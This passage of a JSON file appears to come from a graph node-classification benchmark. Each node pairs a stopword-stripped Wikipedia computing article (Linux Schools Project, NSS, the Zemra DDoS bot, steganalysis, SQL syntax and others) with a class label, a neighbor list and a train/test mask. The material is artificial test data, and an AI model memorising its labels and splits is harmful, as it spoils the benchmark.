    "text": "The_Linux_Schools_Project:linux schools project linux schools project formerly karoshi translated literally death overwork japanese operating system designed schools linux distribution based ubuntu operating system project maintains two custom distributions one designed use servers use server version client machines server distribution official karoshi client known karoshi client tlsp uses prepackaged gui scripts order simplify install configuration process inexperienced users tlsp originally developed using red hat early 2000s aim making linux adoption easier schools uk linux time considered difficult use educational environments computing expertise mainly came teachers dedicated staff version 5.1.x tlsp moved pclinuxos platform since adopted ubuntu place current production version tlsp 11.1 tlsp downloadable homepage installation steps require initial install ubuntu live cd prompts initiate following machine reboot installation ubuntu install tlsp system initiated automatically tlsp primarily aimed educational environments also suitable use small medium enterprise sme business environment included systems suitable use file print email web e-learning servers leveraging technologies possible administer complete network using integrated web tools using form remote desktop technology tlsp system scalable single multi server system comprising many features chief among ability act primary domain controller windows network tlsp uses built samba ldap servers store user group computer information emulates microsoft windows nt 4.0 server system using technologies providing computer user authentication along file print services local network tlsp creates standard windows domain local network names linuxgrid tlsp uses kixtart scripts set windows xp clients domain providing mandatory profiles users system roaming profiles used recommended due heavy network overhead involved using mandatory profiles folder redirection mapped file shares server allows every user store files documents folder tlsp includes moodle e-learning package several website content management systems including joomla website baker egroupware squirrelmail built system allowing full calendar email facilities installed standalone machine dmz section thus providing increased security systems directly exposed internet particularly interesting inclusion wpkg enables remote installation software windows clients using machine profile stored server possible install software packages hotfixes security updates background also helpful terms creating machine profiles allowing 'blank windows xp machine updated automatically particular wpkg profile machine added domain type technology compared group policy mechanism windows server 2003 particularly machine administration perspective means replacement group policy step right direction first version karoshi client based pclinuxos upgrades system whole led client using modified version ubuntu 10.04 lts gui similar microsoft windows interface interface designed fast run well older hardware june 2012 work started karoshi client version 2 would interface closer gnome 2 windows development client release given robin mccorkell student dover grammar school boys 21 july 2012 karoshi client 2 uploaded sourceforge.net karoshi client contains many applications deemed necessary school work media production software including music production image manipulation video editing software included along programming tools visualization software many ides installed default mainly set use java also supporting c/c++ programming languages c++ compiler standard libraries installed default along boost libraries ncurses mesa libraries opengl programming java development kit installed integrated installed ides xfce used desktop manager customized theme panel layout developer ported clearlooks gtk2 theme gtk3 gnome 3 applications like gedit would display correctly panel layout similar gnome 2 environment compositing effects enabled default environment interface settings locked xfce configuration files due need suitability school environment children may try play settings kde greeter lightdm used log screen due problems kdm ubiquity version karoshi client integrated server distribution previous client releases custom configuration files pulled primary domain controller boot server patch added correct files client released 23 july 2012 difficult integrate tlsp existing windows network without changing address space standard one used tlsp system limitation early versions longer applies kerberos support planned karoshi server client system providing single sign services provided karoshi distribution unfeasible samba 4 released due complexities surrounding integration user resolution file access across multiple operating systems support active directory protocols integration occurred already working client system authenticates using kerberos authenticates successfully moodle samba squid using kerberos credentials",
    "neighbors": [
      9728,
      8837,
      7435,
      6797,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      2738,
      3250,
      4790,
      823,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      1353,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      5608,
      4841,
      6890,
      7913,
      7020,
      9064,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      9455,
      9461,
      8438,
      10860,
      6393,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 9277,
    "label": 6,
    "text": "Panasas:panasas panasas data storage company creates network-attached storage technical computing environments founded 1999 garth gibson william courtright panasas computer data storage product company headquartered sunnyvale california panasas received seed funding mohr davidow ventures mdv others first panasas products shipped 2004 year victor m. perez became ceo faye pairman became ceo 2011 panasas developed extension managing parallel file access network file system later integrated parallel nfs pnfs part nfs version 4.1 specification published internet engineering task force rfc 5661 january 2010. pnfs described way nfs protocol process file requests multiple servers storage devices instead handling requests serially panasas supports directflow nfs parallel nfs server message block also known cifs data access protocols integrate existing local area networks panasas blade servers manage metadata serving data directflow nfs cifs clients using 10 gigabit ethernet panasas systems provide data storage management high-performance applications biosciences energy media entertainment manufacturing government research sectors activestor product line scale-out nas appliance integrates hybrid storage hardware hard drives solid state drives panfs parallel file system proprietary directflow data access protocol industry standard nfs cifs network protocols activestor ultra introduced november 2018 newest generation panasas activestor storage system features re-engineered portable file system delivers performance reliability suitably qualified industry standard storage hardware platforms activestor ultra four storage nodes node six hdd drive slots two ssd drive slots node supports six eight hdds zero two ssds activestor ultra deliver 6-7.5 gb/s per 4u enclosure depending configuration minimum configuration three activestor ultra enclosures total bandwidth performance expected 18-22 gb/s activestor ultra designed extreme performance extreme scalability configurations supports flexible networking options activestor ultra/panfs 8 solution aimed hpc shops well enterprises need kind performance parallel file systems afford enterprise customers especially approach intended give kind simplicity low tco demand activestor 20 activestor classic announced august 2016 increased capacity using larger faster disks november 2017 panasas released activestor director 100 activestor hybrid 100 activestor prime disaggregated director blade controller node panasas storage system storage nodes november 2018 panasas introduced activestor ultra featured completely re-engineered portable file system panfs® 8 running industry standard hardware panasas created panfs clustered file system single pool storage global filename space support multiple applications workflows single storage system panfs supports directflow pnfs nfs cifs data access protocols simultaneously panfs 7.0 added freebsd operating foundation gui supports asynchronous push notification system changes without user interaction november 2018 panasas introduced panfs 8 intelligent posix compliant parallel file system incorporates latest software innovations runs linux enable easy portability new industry standard hardware panfs 8 includes newly re-engineered storage node software stack use new activestor ultra family storage nodes panfs theoretically portable across much wider array hardware opening possibility hosting file system third-party storage platforms file system ’ portability also offers panasas flexibility use different hardware suppliers future versions activestor hardware – director storage modules advantage keeping costs potentially offering even options customers panfs 8 optimized match object access update patterns common mixed workloads directflow parallel data access protocol designed panasas activestor directflow avoids protocol i/o bottlenecks accessing panasas storage directly parallel directflow originally supported linux expanded april 2016 support apple macos",
    "neighbors": [
      3328,
      3909,
      998,
      1801,
      2314,
      1454,
      5167,
      6003,
      823,
      2395,
      3677
    ],
    "mask": "Train"
  },
  {
    "node_id": 9278,
    "label": 7,
    "text": "Proofpoint_Systems,_Inc.:proofpoint systems inc. proofpoint systems inc. provider software systems programs support individual organizational performance based silicon valley los altos california founded 2003 jim hill proofpoint systems developed first browser-based performance analysis software systems proofpoint systems research development facilities denver colorado well sales offices phoenix arizona washington d.c. proofpoint systems founded 2003 jim hill retired united states marine corps officer former sun microsystems executive year proofpoint secured contracts united states navy resulting international society performance improvement award 2005 patent proofpoint systems performance analysis support system pass filed april 5 2006 published october 25 2007 pass operates guiding user detailed consistent analysis process ... helping organizational leaders accurately diagnose critical performance productivity issues proofpoint first product comprehensive performance analysis support system compass later developed web-based organizational analysis system management consulting engagements 2006 compass finalist stevie awards category best new product service year proofpoint systems awarded united states navy contracts support strategic planning manpower training education proofpoint offers products services including strategic planning goal development web based diagnostics assessment",
    "neighbors": [
      9665,
      4194,
      8061
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9279,
    "label": 4,
    "text": "Amazingports:amazingports amazingports linux-based software product customized use firewall captive portal billing system hotspots project started 2001 amazingports mainly deployed access control system private public networks deployed single hotspot controller airports hotels private locations hospitals used internet cafes europe 2002 together intel used city-wide wi-fi project 2004 internet roaming 2002 amazingports created 2001 initial vision building free networks later company refocused provided technology network builders company implemented service-oriented provisioning 2002 first implement 802.11a public hotspots europe 2009 2010 administrative system updated features include",
    "neighbors": [
      1792,
      2049,
      4480,
      2825,
      6797,
      1172,
      9496,
      3482,
      1436,
      4511,
      6431,
      5924,
      550,
      8998,
      10790,
      7082,
      1708,
      3885,
      686,
      7983,
      8753,
      2996,
      823,
      569,
      5178,
      11577,
      3007,
      10303,
      5057,
      1858,
      10433,
      11073,
      2118,
      5959,
      9927,
      5322,
      4814,
      7887,
      9423,
      7121,
      10574,
      10451,
      10708,
      11086,
      4568,
      9048,
      1754,
      2907,
      5978,
      6364,
      5860,
      3942,
      8943,
      8816,
      9971,
      10872,
      1273,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 9280,
    "label": 7,
    "text": "ORBexpress:orbexpress ois orbexpress commercial object request broker orb product objective interface systems ada c++ c java programming languages orbexpress features tools developing debugging distributed real-time applications",
    "neighbors": [
      7234,
      5380,
      8100,
      10985,
      5356,
      428,
      823,
      5677,
      7983,
      9964,
      1399,
      1304,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 9281,
    "label": 5,
    "text": "Network_Security_Services:network security services computing network security services nss comprises set libraries designed support cross-platform development security-enabled client server applications optional support hardware tls/ssl acceleration server side hardware smart cards client side nss provides complete open-source implementation cryptographic libraries supporting transport layer security tls secure sockets layer ssl s/mime previously tri-licensed mozilla public license 1.1 gnu general public license gnu lesser general public license nss upgraded gpl-compatible mpl 2.0 release 3.14 nss originated libraries developed netscape invented ssl security protocol nss software crypto module validated five times 1997 1999 2002 2007 2010 conformance fips 140 security levels 1 2 nss first open source cryptographic library receive fips 140 validation nss libraries passed niscc tls/ssl s/mime test suites 1.6 million test cases invalid input data aol red hat sun microsystems/oracle corporation google companies individual contributors co-developed nss mozilla provides source code repository bug tracking system infrastructure mailing lists discussion groups others named use nss variety products including following nss includes framework developers oems contribute patches assembly code optimize performance platforms mozilla certified nss 3.x 18 platforms nss makes use netscape portable runtime nspr platform-neutral open-source api system functions designed facilitate cross-platform development like nss nspr used heavily multiple products addition libraries apis nss provides security tools required debugging diagnostics certificate key management cryptography-module management development tasks nss comes extensive growing set documentation including introductory material api references codice_1 pages command-line tools sample code programmers utilize nss source shared dynamic libraries every nss release backward-compatible previous releases allowing nss users upgrade new nss shared libraries without recompiling relinking applications nss supports range security standards including following nss supports pkcs 11 interface access cryptographic hardware like tls/ssl accelerators hsm-s smart cards since hardware vendors safenet inc. aep thales also support interface nss-enabled applications work high-speed crypto hardware use private keys residing various smart cards vendors provide necessary middleware nss version 3.13 support advanced encryption standard new instructions aes-ni network security services java jss consists java interface nss supports security standards encryption technologies supported nss jss also provides pure java interface asn.1 types ber/der encoding mozilla cvs tree makes source code java interface nss available",
    "neighbors": [
      513,
      2050,
      4100,
      517,
      9736,
      9744,
      9745,
      9757,
      2083,
      9764,
      5677,
      7736,
      7238,
      3657,
      10831,
      11345,
      6231,
      8283,
      7264,
      10850,
      10341,
      9318,
      10860,
      7794,
      5749,
      4728,
      2169,
      3707,
      637,
      1664,
      1157,
      6791,
      4746,
      8331,
      1683,
      1688,
      11418,
      3742,
      10405,
      8358,
      11432,
      4268,
      1713,
      9394,
      7859,
      2228,
      7861,
      11449,
      9412,
      5834,
      7889,
      728,
      3805,
      9451,
      9455,
      2804,
      8443,
      251,
      5373,
      4863,
      9987,
      1288,
      5899,
      1295,
      5391,
      1297,
      1810,
      7951,
      2836,
      10006,
      8994,
      7983,
      10033,
      7474,
      11569,
      3382,
      9541,
      10057,
      2893,
      11088,
      3422,
      10078,
      9580,
      6519,
      7543,
      3959,
      10631,
      8584,
      11693,
      1456,
      10161,
      1978,
      5054,
      8640,
      9152,
      9665,
      6602,
      5078,
      5590,
      474,
      482,
      7139,
      8674,
      10722,
      488,
      8169,
      5612,
      5107,
      6133,
      501,
      1526,
      5114,
      2045,
      510,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 9282,
    "label": 4,
    "text": "Zemra:zemra zemra ddos bot first discovered underground forums may 2012 zemra capable http syn flood flooding also simple command control panel protected 256-bit des encryption communicating command control c c server zemra also sends information computer name language settings windows version send data remote location specific date time also opens backdoor tcp port 7710 receive commands remote command-and-control server able monitor devices collect system information execute files even update uninstall necessary",
    "neighbors": [
      9536,
      9569,
      2018,
      10852,
      901,
      4488,
      2409,
      6347,
      1965,
      2299,
      9727
    ],
    "mask": "Test"
  },
  {
    "node_id": 9283,
    "label": 4,
    "text": "RISKS_Digest:risks digest risks digest forum risks public computers related systems online periodical published since 1985 committee computers public policy association computing machinery editor peter g. neumann moderated forum concerned security safety computers software technological systems security risk taken broadly risks concerned merely so-called security holes software unintended consequences hazards stemming design lack thereof automated systems recurring subjects include cryptography effects technically ill-considered public policies risks also publishes announcements calls papers various technical conferences technical book reviews usually rob slade though occasionally others although risks forum computer science association contributions readable informative anyone interest subject heavily read system administrators computer security managers well computer scientists engineers risks digest published frequent irregular schedule moderated usenet newsgroup comp.risks exists solely carry digest summaries forum appear columns edited neumann acm sigsoft software engineering notes sen communications acm cacm",
    "neighbors": [
      6305,
      10372,
      709,
      3350,
      8155,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9284,
    "label": 5,
    "text": "Multi-frequency_time-division_multiple_access:multi-frequency time-division multiple access mf-tdma multi-frequency time-division multiple access technology dynamically sharing bandwidth resources over-the-air two-way communications network",
    "neighbors": [
      10112,
      2306,
      388,
      8708,
      3847,
      11288,
      2458,
      5020,
      1192,
      11560,
      7723,
      11181,
      7490,
      5321,
      7498,
      2911,
      3168,
      2785,
      5092,
      5863,
      2802
    ],
    "mask": "None"
  },
  {
    "node_id": 9285,
    "label": 3,
    "text": "Single_point_of_failure:single point failure single point failure spof part system fails stop entire system working spofs undesirable system goal high availability reliability business practice software application industrial system systems made robust adding redundancy potential spofs instance owner small tree care company may one woodchipper chipper breaks may unable complete current job may cancel future jobs obtain replacement redundancy achieved various levels instance owner tree care company may spare parts ready repair wood chipper case fails higher level may second wood chipper bring job site finally highest level may enough equipment available completely replace everything work site case multiple failures assessment potential spof involves identifying critical components complex system would provoke total systems failure case malfunction highly reliable systems rely individual component computing redundancy achieved internal component level system level multiple machines site level replication one would normally deploy load balancer ensure high availability server cluster system level high-availability server cluster individual server may attain internal component redundancy multiple power supplies hard drives components system level redundancy could obtained spare servers waiting take work another server fails since data center often support center operations business logic represents potential spof thus site level entire cluster may replicated another location accessed case primary location becomes unavailable typically addressed part disaster recovery resiliency program paul baran donald davies developed packet switching key part survivable communications networks networks including arpanet internet designed single point failure multiple paths two points network allow points continue communicating packets routing around damage even single failure one particular path one intermediate node network protocols used prevent spof software engineering bottleneck occurs capacity application computer system severely limited single component bottleneck lowest throughput parts transaction path tracking bottlenecks sometimes known hot spots sections code execute frequently i.e highest execution count called performance analysis reduction usually achieved help specialized tools known performance analyzers profilers objective make particular sections code perform fast possible improve overall algorithmic efficiency mistake one component compromise entire system concept single point failure also applied fields outside engineering computers networking corporate supply chain management transportation management design structures create single points failure include bottlenecks series circuits contrast parallel circuits transportation noted recent examples concept recent application included nipigon river bridge canada partial bridge failure january 2016 entirely severed road traffic eastern canada western canada several days located along portion trans-canada highway alternate detour route vehicles take norwalk river railroad bridge norwalk connecticut aging swing bridge sometimes gets stuck opening closing disrupting rail traffic northeast corridor line concept single point failure also applied fields intelligence edward snowden talked dangers described single point failure – sole repository information",
    "neighbors": [
      6531,
      8195,
      7049,
      2314,
      4878,
      8343,
      2206,
      8865,
      8229,
      3495,
      3751,
      8233,
      2986,
      5047,
      2117,
      7753,
      9677,
      11343,
      4817,
      6877,
      3805,
      7794,
      6003,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 9286,
    "label": 1,
    "text": "Relational_database:relational database relational database digital database based relational model data proposed e. f. codd 1970 software system used maintain relational databases relational database management system rdbms many relational database systems option using standard sql structured query language querying maintaining database term relational database invented e. f. codd ibm 1970 codd introduced term research paper relational model data large shared data banks paper later papers defined meant relational one well-known definition constitutes relational database system composed codd 12 rules however commercial implementations relational model conform codd rules term gradually come describe broader class database systems minimum 1974 ibm began developing system r research project develop prototype rdbms however first commercially available rdbms oracle released 1979 relational software oracle corporation examples rdbms include db2 sap sybase ase informix 1984 first rdbms macintosh began developed code-named silver surfer later released 1987 4th dimension known today 4d first systems relatively faithful implementations relational model first system sold rdbms multics relational data store 1978 ingres ibm bs12 followed common definition rdbms product presents view data collection rows columns even based strictly upon relational theory definition rdbms products typically implement codd 12 rules second school thought argues database implement codd rules current understanding relational model expressed christopher j date hugh darwen others relational view shared many theorists strict adherents codd principles would disqualify dbmss relational clarification often refer rdbmss truly-relational database management systems trdbms naming others pseudo-relational database management systems prdbms 2009 commercial relational dbmss employ sql query language alternative query languages proposed implemented notably pre-1996 implementation ingres quel model organizes data one tables relations columns rows unique key identifying row rows also called records tuples columns also called attributes generally table/relation represents one entity type customer product rows represent instances type entity lee chair columns representing values attributed instance address price row table unique key rows table linked rows tables adding column unique key linked row columns known foreign keys codd showed data relationships arbitrary complexity represented simple set concepts part processing involves consistently able select modify one one row table therefore physical implementations unique primary key pk row table new row written table new unique value primary key generated key system uses primarily accessing table system performance optimized pks natural keys may also identified defined alternate keys ak often several columns needed form ak one reason single integer column usually made pk pks aks ability uniquely identify row within table additional technology may applied ensure unique id across world globally unique identifier broader system requirements primary keys within database used define relationships among tables pk migrates another table becomes foreign key table cell contain one value pk migrates regular entity table design pattern represent either one-to-one one-to-many relationship relational database designs resolve many-to-many relationships creating additional table contains pks entity tables—the relationship becomes entity resolution table named appropriately two fks combined form pk migration pks tables second major reason system-assigned integers used normally pks usually neither efficiency clarity migrating bunch types columns relationships logical connection different tables established basis interaction among tables order database management system dbms operate efficiently accurately must use acid transactions programming within rdbms accomplished using stored procedures sps often procedures used greatly reduce amount information transferred within outside system increased security system design may grant access stored procedures directly tables fundamental stored procedures contain logic needed insert new update existing data complex procedures may written implement additional rules logic related processing selecting data relational database first defined june 1970 edgar codd ibm san jose research laboratory codd view qualifies rdbms summarized codd 12 rules relational database become predominant type database models besides relational model include hierarchical database model network model table summarizes important relational database terms corresponding sql term relation defined set tuples attributes tuple usually represents object information object objects typically physical objects concepts relation usually described table organized rows columns data referenced attribute domain conform constraints relational model specifies tuples relation specific order tuples turn impose order attributes applications access data specifying queries use operations select identify tuples project identify attributes join combine relations relations modified using insert delete update operators new tuples supply explicit values derived query similarly queries identify tuples updating deleting tuples definition unique tuple contains candidate primary key obviously unique however primary key need defined row record tuple definition tuple requires unique require primary key defined tuple unique attributes definition constitute superkey relational database data stored accessed via relations relations store data called base relations implementations called tables relations store data computed applying relational operations relations relations sometimes called derived relations implementations called views queries derived relations convenient act single relation even though may grab information several relations also derived relations used abstraction layer domain describes set possible values given attribute considered constraint value attribute mathematically attaching domain attribute means value attribute must element specified set character string abc instance integer domain integer value 123 another example domain describes possible values field coinface heads tails field coinface accept input values like 0,1 h constraints make possible restrict domain attribute instance constraint restrict given integer attribute values 1 10 constraints provide one method implementing business rules database support subsequent data use within application layer sql implements constraint functionality form check constraints constraints restrict data stored relations usually defined using expressions result boolean value indicating whether data satisfies constraint constraints apply single attributes tuple restricting combinations attributes entire relation since every attribute associated domain constraints domain constraints two principal rules relational model known entity integrity referential integrity primary key uniquely specifies tuple within table order attribute good primary key must repeat natural attributes attributes used describe data entered sometimes good primary keys surrogate keys often used instead surrogate key artificial attribute assigned object uniquely identifies instance table information students school might assigned student id order differentiate surrogate key intrinsic inherent meaning rather useful ability uniquely identify tuple another common occurrence especially regard n cardinality composite key composite key key made two attributes within table together uniquely identify record example database relating students teachers classes classes could uniquely identified composite key room number time slot since class could exactly combination attributes fact use composite key form data verification albeit weak one foreign key field relational table matches primary key column another table relates two keys foreign keys need unique values referencing relation foreign key used cross-reference tables effectively uses values attributes referenced relation restrict domain one attributes referencing relation concept described formally tuples referencing relation projected referencing attributes must exist tuple referenced relation projected attributes values referencing attributes match corresponding values referenced attributes stored procedure executable code associated generally stored database stored procedures usually collect customize common operations like inserting tuple relation gathering statistical information usage patterns encapsulating complex business logic calculations frequently used application programming interface api security simplicity implementations stored procedures sql rdbms often allow developers take advantage procedural extensions often vendor-specific standard declarative sql syntax stored procedures part relational database model commercial implementations include index one way providing quicker access data indexes created combination attributes relation queries filter using attributes find matching tuples randomly using index without check tuple turn analogous using index book go directly page information looking found read entire book find looking relational databases typically supply multiple indexing techniques optimal combination data distribution relation size typical access pattern indices usually implemented via b+ trees r-trees bitmaps indices usually considered part database considered implementation detail though indices usually maintained group maintains parts database use efficient indexes primary foreign keys dramatically improve query performance b-tree indexes result query times proportional log n n number rows table hash indexes result constant time queries size dependency long relevant part index fits memory queries made relational database derived relvars database expressed relational calculus relational algebra original relational algebra codd introduced eight relational operators two groups four operators first four operators based traditional mathematical set operations remaining operators proposed codd involve special operations specific relational databases operators introduced proposed since codd introduction original eight including relational comparison operators extensions offer support nesting hierarchical data among others normalization first proposed codd integral part relational model encompasses set procedures designed eliminate non-simple domains non-atomic values redundancy duplication data turn prevents data manipulation anomalies loss data integrity common forms normalization applied databases called normal forms connolly begg define database management system dbms software system enables users define create maintain control access database rdbms extension acronym sometimes used underlying database relational alternative definition relational database management system database management system dbms based relational model databases widespread use today based model rdbmss common option storage information databases used financial records manufacturing logistical information personnel data applications since 1980s relational databases often replaced legacy hierarchical databases network databases rdbms easier implement administer nonetheless relational databases received continued unsuccessful challenges object database management systems 1980s 1990s introduced attempt address so-called object-relational impedance mismatch relational databases object-oriented application programs well xml database management systems 1990s however due expanse technologies horizontal scaling computer clusters nosql databases recently become popular alternative rdbms databases distributed relational database architecture drda designed workgroup within ibm period 1988 1994 drda enables network connected relational databases cooperate fulfill sql requests messages protocols structural components drda defined distributed data management architecture according db-engines july 2019 widely used systems oracle mysql free software microsoft sql server postgresql free software ibm db2 microsoft access sqlite free software mariadb free software according research company gartner 2011 five leading proprietary software relational database vendors revenue oracle 48.8 ibm 20.2 microsoft 17.0 sap including sybase 4.6 teradata 3.7",
    "neighbors": [
      5632,
      4614,
      4617,
      3594,
      8201,
      1549,
      2063,
      2068,
      7191,
      3096,
      1049,
      5658,
      8217,
      5151,
      9248,
      9762,
      4135,
      10793,
      10286,
      9268,
      6709,
      9782,
      10292,
      1594,
      4155,
      5691,
      9789,
      11324,
      11327,
      1606,
      2631,
      2632,
      9290,
      4174,
      8788,
      10326,
      7767,
      5210,
      10849,
      8291,
      1636,
      9828,
      10340,
      8808,
      2669,
      8301,
      9837,
      6775,
      5242,
      1146,
      3196,
      6780,
      11393,
      8844,
      10389,
      1178,
      3230,
      4255,
      1697,
      5794,
      7331,
      4263,
      2217,
      10921,
      10413,
      9397,
      7868,
      11457,
      6850,
      2246,
      9926,
      5833,
      8393,
      4811,
      6348,
      6860,
      9420,
      11472,
      5841,
      10452,
      9942,
      2775,
      6359,
      10459,
      2780,
      734,
      1767,
      10471,
      5866,
      6383,
      3312,
      242,
      7412,
      5879,
      5880,
      3833,
      3323,
      6395,
      6403,
      261,
      8460,
      270,
      3343,
      10511,
      11024,
      8979,
      7446,
      10518,
      11030,
      5401,
      5403,
      284,
      11551,
      3366,
      2344,
      4393,
      5929,
      6959,
      6451,
      10551,
      1341,
      10048,
      2369,
      3906,
      5953,
      11082,
      10060,
      11085,
      6479,
      2901,
      10069,
      347,
      8539,
      7518,
      5983,
      11616,
      7523,
      4452,
      8554,
      2413,
      7022,
      9075,
      9589,
      6521,
      890,
      6015,
      10628,
      10632,
      7053,
      2966,
      2456,
      9112,
      10137,
      2972,
      9631,
      9634,
      1447,
      7080,
      5034,
      5546,
      1964,
      8111,
      9144,
      3001,
      10681,
      3515,
      3004,
      9661,
      6085,
      10193,
      6101,
      987,
      4065,
      4066,
      7650,
      3556,
      6629,
      2026,
      8683,
      6124,
      2544,
      10737,
      6131,
      8181,
      502
    ],
    "mask": "Test"
  },
  {
    "node_id": 9287,
    "label": 4,
    "text": "List_of_rogue_security_software:list rogue security software following partial list rogue security software grouped families functionally identical versions program repackaged successive new products vendor",
    "neighbors": [
      224,
      8064,
      4165,
      3333,
      1417,
      8215,
      10392,
      10556
    ],
    "mask": "Test"
  },
  {
    "node_id": 9288,
    "label": 0,
    "text": "Eugene_Charniak:eugene charniak eugene charniak computer science cognitive science professor brown university a.b physics university chicago ph.d. m.i.t computer science research always area language understanding technologies relate knowledge representation reasoning uncertainty learning since early 1990s interested statistical techniques language understanding research area included work subareas part-of-speech tagging probabilistic context-free grammar induction recently syntactic disambiguation word statistics efficient syntactic parsing lexical resource acquisition statistical means fellow american association artificial intelligence previously councilor organization also honored 2011 association computational linguistics lifetime achievement award awarded 2011 calvin rose g hoffman prize 2011 named fellow association computational linguistics 2015 association advancement artificial intelligence aaai classic paper award paper “ statistical parsing context-free grammar word statistics ” presented fourteenth national conference artificial intelligence 1997 published five books",
    "neighbors": [
      4774,
      7048,
      1737,
      9879,
      7724,
      2062,
      1783,
      4350
    ],
    "mask": "None"
  },
  {
    "node_id": 9289,
    "label": 4,
    "text": "Steganalysis:steganalysis steganalysis study detecting messages hidden using steganography analogous cryptanalysis applied cryptography goal steganalysis identify suspected packages determine whether payload encoded possible recover payload unlike cryptanalysis intercepted data contains message though message encrypted steganalysis generally starts pile suspect data files little information files contain payload steganalyst usually something forensic statistician must start reducing set data files often quite large many cases may entire set files computer subset likely altered problem generally handled statistical analysis set unmodified files type ideally source example model digital camera possible digital camera digital audio cd mp3 files ripped etc set inspected analyzed various statistics simple spectrum analysis since image audio files days compressed lossy compression algorithms jpeg mp3 also attempt look inconsistencies way data compressed example common artifact jpeg compression edge ringing high-frequency components high-contrast edges black text white background distort neighboring pixels distortion predictable simple steganographic encoding algorithms produce artifacts detectably unlikely one case detection suspect files straightforward original unmodified carrier available comparison comparing package original file yield differences caused encoding payload—and thus payload extracted cases single image available complicated analysis techniques may required general steganography attempts make distortion carrier indistinguishable carrier noise floor practice however often improperly simplified deciding make modifications carrier resemble white noise closely possible rather analyzing modeling consistently emulating actual noise characteristics carrier particular many simple steganographic systems simply modify least-significant bit lsb sample causes modified samples different noise profiles unmodified samples also lsbs different noise profiles could expected analysis higher-order bits still show amount noise lsb-only modification detected appropriate algorithms cases detecting encoding densities low 1 reasonable reliability detecting probable steganographic payload often part problem payload may encrypted first encrypting payload always done solely make recovery payload difficult strong ciphers desirable property making payload appear indistinguishable uniformly-distributed noise make detection efforts difficult save steganographic encoding technique trouble distribute signal energy evenly see concerning errors emulating native noise carrier inspection storage device considered likely steganographer may attempt barrage potential analyst effectively misinformation may large set files encoded anything random data white noise meaningless drivel deliberately misleading information encoding density files may slightly higher real ones likewise possible use multiple algorithms varying detectability considered steganalyst may forced checking decoys first potentially wasting significant time computing resources downside technique makes much obvious steganographic software available used obtaining warrant taking action based solely steganalytic evidence dicey proposition unless payload completely recovered decrypted otherwise analyst statistic indicating file may modified modification may result steganographic encoding likely frequently case steganalytic suspicions often backed investigative techniques",
    "neighbors": [
      7424,
      9319,
      1544,
      7369,
      302,
      3924,
      1941,
      10582
    ],
    "mask": "None"
  },
  {
    "node_id": 9290,
    "label": 1,
    "text": "SQL_syntax:sql syntax syntax sql programming language defined maintained iso/iec sc 32 part iso/iec 9075 standard freely available despite existence standard sql code completely portable among different database systems without adjustments /math sql language subdivided several language elements including operators times suggested implemented skyline operator finding records 'worse others sql codice_1 expression introduced sql-92 general form called searched case sql standard sql tests codice_2 conditions order appear source source specify codice_3 expression sql defaults codice_4 abbreviated syntax—called simple case sql standard—mirrors switch statements syntax uses implicit equality comparisons usual caveats comparing null two short forms special codice_5 expressions codice_6 codice_7 codice_6 expression returns value first non-null operand found working left right null operands equal null equivalent codice_7 expression two operands returns null operands value otherwise value first operand equivalent standard sql allows two formats comments codice_10 ended first newline codice_11 span multiple lines common operation sql query makes use declarative codice_12 statement codice_12 retrieves data one tables expressions standard codice_12 statements persistent effects database non-standard implementations codice_12 persistent effects codice_16 syntax provided databases queries allow user describe desired data leaving database management system dbms carry planning optimizing performing physical operations necessary produce result chooses query includes list columns include final result normally immediately following codice_12 keyword asterisk codice_18 used specify query return columns queried tables codice_12 complex statement sql optional keywords clauses include clauses query particular order execution denoted number right hand side follows following example codice_12 query returns list expensive books query retrieves rows book table price column contains value greater 100.00 result sorted ascending order title asterisk select list indicates columns book table included result set example demonstrates query multiple tables grouping aggregation returning list books number authors associated book example output might resemble following precondition isbn common column name two tables column named title exists book table one could re-write query following form however many vendors either support approach require certain column-naming conventions natural joins work effectively sql includes operators functions calculating values stored values sql allows use expressions select list project data following example returns list books cost 100.00 additional sales_tax column containing sales tax figure calculated 6 price queries nested results one query used another query via relational operator aggregation function nested query also known subquery joins table operations provide computationally superior i.e faster alternatives many cases use subqueries introduces hierarchy execution useful necessary following example aggregation function codice_38 receives input result subquery subquery use values outer query case known correlated subquery since 1999 sql standard allows codice_39 clauses subqueries i.e named subqueries usually called common table expressions also called subquery factoring ctes also recursive referring resulting mechanism allows tree graph traversals represented relations generally fixpoint computations derived table use referencing sql subquery clause essentially derived table subquery selected joined derived table functionality allows user reference subquery table inline view also referred inline view subselect following example sql statement involves join initial book table derived table sales derived table captures associated book sales information using isbn join book table result derived table provides result set additional columns number items sold company sold books concept null allows sql deal missing information relational model word codice_40 reserved keyword sql used identify null special marker comparisons null instance equality clauses results unknown truth value select statements sql returns results clause returns value true i.e. excludes results values false also excludes whose value unknown along true false unknown resulting direct comparisons null thus brings fragment three-valued logic sql truth tables sql uses correspond common fragment kleene lukasiewicz three-valued logic differ definition implication however sql defines operation however disputes semantic interpretation nulls sql treatment outside direct comparisons seen table direct equality comparisons two nulls sql e.g codice_41 return truth value unknown line interpretation null value member data domain rather placeholder mark missing information however principle two nulls n't equal effectively violated sql specification codice_42 codice_43 operators identify nulls consequently set operations sql may produce results representing sure information unlike operations involving explicit comparisons null e.g codice_23 clause discussed codd 1979 proposal basically adopted sql92 semantic inconsistency rationalized arguing removal duplicates set operations happens lower level detail equality testing evaluation retrieval operations however computer-science professor ron van der meyden concluded inconsistencies sql standard mean possible ascribe intuitive logical semantics treatment nulls sql additionally sql operators return unknown comparing anything null directly sql provides two null-specific comparison predicates codice_45 codice_46 test whether data null sql explicitly support universal quantification must work negated existential quantification also row value expression distinct row value expression infixed comparison operator returns true unless operands equal null likewise distinct defined row value expression distinct row value expression also introduced codice_47 type variables according standard also hold unknown values nullable practice number systems e.g postgresql implement boolean unknown boolean null standard says null boolean unknown may used interchangeably mean exactly thing /ref data manipulation language dml subset sql used add update delete data transactions available wrap dml operations codice_59 codice_60 terminate current transaction release data locks absence codice_54 similar statement semantics sql implementation-dependent following example shows 